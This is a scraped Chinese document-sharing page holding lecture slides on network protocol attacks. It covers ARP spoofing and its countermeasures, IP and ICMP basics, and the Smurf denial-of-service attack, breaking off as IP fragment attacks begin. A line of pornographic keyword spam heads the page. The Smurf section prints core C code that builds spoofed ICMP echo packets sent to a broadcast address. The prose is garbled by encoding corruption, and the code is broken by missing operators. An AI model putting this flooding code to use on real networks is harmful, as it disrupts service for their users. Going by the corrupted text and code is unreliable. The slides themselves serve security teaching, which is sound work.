freepeople性欧美熟妇, 色戒完整版无删减158分钟hd, 无码精品国产vα在线观看DVD, 丰满少妇伦精品无码专区在线观看,艾栗栗与纹身男宾馆3p50分钟,国产AV片在线观看,黑人与美女高潮,18岁女RAPPERDISSSUBS,国产手机在机看影片

正文內(nèi)容

保障與安全攻擊6網(wǎng)絡(luò)協(xié)議攻擊-文庫(kù)吧

2024-12-25 20:29 本頁(yè)面


【正文】 修改 、 切斷 、 劫持主機(jī) A、 B之間的通信 。 需要注意的是 , ARP緩存有一定的有效期 。 針對(duì)這一點(diǎn) , 可以編寫簡(jiǎn)單的軟件 , 給目標(biāo)機(jī)器一直發(fā)送ARP響應(yīng) , 保證目標(biāo)機(jī)器的 ARP緩存有效 。 某些 ARP實(shí)現(xiàn)會(huì)試著給緩存中的各個(gè)映射發(fā)送請(qǐng)求 。 這將給攻擊者帶來(lái)一定的麻煩 , 因?yàn)檎嬲?IP地址會(huì)對(duì)請(qǐng)求做出響應(yīng) 。 不過(guò) ARP系統(tǒng)的無(wú)狀態(tài)本性再次幫了黑客的忙 , 也就是在請(qǐng)求被發(fā)送之前 , 黑客先對(duì)請(qǐng)求做出響應(yīng)從而防止請(qǐng)求被發(fā)送 。 網(wǎng)絡(luò)協(xié)議攻擊 20 (2) 發(fā)送 ARP請(qǐng)求 , 源 IP地址為目標(biāo)的 IP地址 , 而源 MAC地址填充目標(biāo) MAC地址以外的其它 MAC地址 。這種方式將刷新所有網(wǎng)段內(nèi)主機(jī)的 Cache, 同時(shí) , 目標(biāo)主機(jī)將彈出如下對(duì)話框如圖 6所示 。 因?yàn)槟繕?biāo)發(fā)現(xiàn)網(wǎng)段內(nèi)存在一 IP地址與本機(jī) IP地址相同的主機(jī) 。 網(wǎng)絡(luò)協(xié)議攻擊 21 圖 86 地址出現(xiàn)沖突 網(wǎng)絡(luò)協(xié)議攻擊 22 利用前面介紹的 ARP欺騙還可以演變很多種攻擊方式 ,如拒絕服務(wù)攻擊等 。 雖然 , ARP攻擊被說(shuō)得很神奇 , 但是仔細(xì)想一下 , 就可以知道 ARP攻擊只能被用于本地網(wǎng)絡(luò)的假冒 。 這意味著黑客必須已經(jīng)獲得網(wǎng)絡(luò)中某臺(tái)機(jī)器的訪問(wèn)權(quán) 。 另外 , ARP請(qǐng)求從來(lái)不會(huì)被送到路由器以外 。 因此 , 被假冒的機(jī)器必須同黑客所控制的機(jī)器位于同一網(wǎng)段內(nèi) , 也就是通過(guò)集線器或者令牌環(huán)網(wǎng)絡(luò)連接 。 針對(duì) ARP重定向攻擊的最好方法是利用硬件和入侵檢測(cè)系統(tǒng),使用交換機(jī)而不是集線器。很多交換機(jī)可以被配置成硬件地址同特定端口相關(guān)聯(lián),而入侵檢測(cè)系統(tǒng)可以識(shí)別 LAN中的 IP攻擊。 網(wǎng)絡(luò)協(xié)議攻擊 23 3 網(wǎng)絡(luò)層協(xié)議攻擊 簡(jiǎn)介 網(wǎng)際協(xié)議 IP是 TCP/IP的核心 , 也是網(wǎng)絡(luò)層中最重要的協(xié)議 。 IP層接收由更低層 (網(wǎng)絡(luò)接口層 , 例如以太網(wǎng)設(shè)備驅(qū)動(dòng)程序 )發(fā)來(lái)的數(shù)據(jù)包 , 并把該數(shù)據(jù)包發(fā)送到更高層 —— TCP或 UDP層;相反 , IP層也把從 TCP或 UDP層接收來(lái)的數(shù)據(jù)包傳送到更低層 。 IP協(xié)議是不可靠的協(xié)議 , 因?yàn)?IP并沒(méi)有做任何事情來(lái)確認(rèn)數(shù)據(jù)包是按順序發(fā)送的或者是沒(méi)有被破壞的 。 IP數(shù)據(jù)包中含有發(fā)送它的主機(jī)的 IP地址 (源地址 )和接收它的主機(jī)的 IP地址(目的地址 )。 網(wǎng)絡(luò)協(xié)議攻擊 24 ICMP與 IP位于同一層 , 它通常被認(rèn)為是 IP層的一個(gè)組成部分 。 它傳遞差錯(cuò)報(bào)文以及其它需要注意的控制信息 。 ICMP數(shù)據(jù)包是封裝在 IP數(shù)據(jù)包的數(shù)據(jù)部分中進(jìn)行傳輸?shù)?。 有關(guān) ICMP的協(xié)議格式及數(shù)據(jù)包類型可參考 RFC792。 在網(wǎng)絡(luò)層實(shí)施網(wǎng)絡(luò)攻擊造成的主要后果是拒絕服務(wù) (DoS, Denial of Service), 此外就是 IP欺騙 。 下面介紹幾種典型的網(wǎng)絡(luò)層協(xié)議攻擊方式 。 網(wǎng)絡(luò)協(xié)議攻擊 25 網(wǎng)絡(luò)層協(xié)議攻擊 1. ?Smurf攻擊 Smurf攻擊是以最初發(fā)動(dòng)這種攻擊的程序名 Smurf來(lái)命名的 。 這種攻擊方法結(jié)合 IP地址欺騙和 ICMP回復(fù)方法使大量網(wǎng)絡(luò)通信充斥目標(biāo)系統(tǒng) , 引起目標(biāo)系統(tǒng)拒絕為正常系統(tǒng)提供服務(wù) 。 當(dāng)路由器接收到一個(gè)發(fā)送給 IP廣播地址 (如) 的分組后 , 把以太網(wǎng)廣播地址FF:FF:FF:FF:FF:FF映射過(guò)來(lái) 。 這樣路由器從因特網(wǎng)上接收到該分組 , 會(huì)對(duì)本地網(wǎng)段中的所有主機(jī)進(jìn)行廣播 ,本地網(wǎng)段接收到廣播分組后就對(duì)該分組響應(yīng) 。 基于此可以通過(guò)如圖 7過(guò)程實(shí)施攻擊 。 網(wǎng)絡(luò)協(xié)議攻擊 26 圖 7 Smurf攻擊 網(wǎng)絡(luò)協(xié)議攻擊 27 攻擊者向一個(gè)具有大量主機(jī)和因特網(wǎng)連接的網(wǎng)絡(luò)的廣播地址發(fā)送一個(gè)欺騙性 Ping分組 (echo請(qǐng)求 , 類型 8, 代碼0), 這個(gè)目標(biāo)網(wǎng)絡(luò)被稱為反彈站點(diǎn) , 而欺騙性 Ping分組的源地址就是 Attacker希望攻擊的目標(biāo)系統(tǒng) 。 由于多數(shù)系統(tǒng)都會(huì)盡快地處理 ICMP傳輸信息 , 攻擊者把分組的源地址設(shè)置為目標(biāo)系統(tǒng) , 因此目標(biāo)系統(tǒng)很快就會(huì)被大量的 echo信息吞沒(méi) , 這樣輕而易舉地就能夠阻止該系統(tǒng)處理其它任何網(wǎng)絡(luò)傳輸 , 從而拒絕為正常系統(tǒng)服務(wù) 。 這種攻擊不僅影響目標(biāo)系統(tǒng),還影響目標(biāo)系統(tǒng)所在的因特網(wǎng)連接。如果反彈站點(diǎn)具有 T3連接 (45?Mb/s),而目標(biāo)系統(tǒng)所在的公司使用的是租用線路 (56 kb/s),則所有進(jìn)出該公司的通信都會(huì)停止下來(lái)。 網(wǎng)絡(luò)協(xié)議攻擊 28 Smurf攻擊的核心 C代碼如下: void smurf (int sock, struct sockaddr_in sin, u_long dest, int psize) { struct iphdr *ip。 struct icmphdr *icmp。 char *packet。 packet = malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)。 ip = (struct iphdr *)packet。 icmp = (struct icmphdr *) (packet + sizeof(struct iphdr))。 網(wǎng)絡(luò)協(xié)議攻擊 29 memset(packet, 0, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)。 /*下面進(jìn)行 IP數(shù)據(jù)包的封裝,構(gòu)造一個(gè)源 IP為目標(biāo)IP、目的 IP為廣播地址的 ICMP echo請(qǐng)求數(shù)據(jù)包 */ iptot_len = htons(sizeof(struct iphdr) + sizeof(struct icmphdr) + psize)。 ipihl = 5。 ipversion = 4。 ipttl = 255。 iptos = 0。 ipfrag_off = 0。 網(wǎng)絡(luò)協(xié)議攻擊 30 ipprotocol = IPPROTO_ICMP。 /*協(xié)議為 ICMP協(xié)議 */ ipsaddr = 。 /*源地址,應(yīng)為目標(biāo)IP*/ ipdaddr = dest。 /*目的地址,應(yīng)為某個(gè)廣播地址 */ ipcheck = in_chksum((u_short *)ip, sizeof(struct iphdr))。 icmptype = 8。 /*echo請(qǐng)求的類型為 8,代碼為 0*/ icmpcode = 0。 icmpchecksum = in_chksum((u_short *)icmp,sizeof(struct icmphdr) + psize)。 網(wǎng)絡(luò)協(xié)議攻擊 31 sendto(sock, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + psize, 0, (struct sockaddr *)amp。sin, sizeof(struct sockaddr))。 free(packet)。 /* free willy! */ } 由以上代碼可以看出 , Smurf攻擊實(shí)現(xiàn)非常簡(jiǎn)單 。 在 Smurf攻擊中還利用了 IP欺騙的技術(shù) 。 所謂欺騙(Spoofing), 也就是造一個(gè)假的源 IP地址的數(shù)據(jù)包 , 當(dāng)另外的主機(jī)接收到這個(gè)包 , 會(huì)以為包是來(lái)自假冒的發(fā)送者 , 這個(gè)過(guò)程稱為欺騙目標(biāo)機(jī)器 。 網(wǎng)絡(luò)協(xié)議攻擊 32 2. ?IP碎片攻擊 鏈路層具有最大傳輸單元 MTU這個(gè)特性 , 它限制了數(shù)據(jù)幀的最大長(zhǎng)度 , 不
點(diǎn)擊復(fù)制文檔內(nèi)容
試題試卷相關(guān)推薦
文庫(kù)吧 www.dybbs8.com
備案圖鄂ICP備17016276號(hào)-1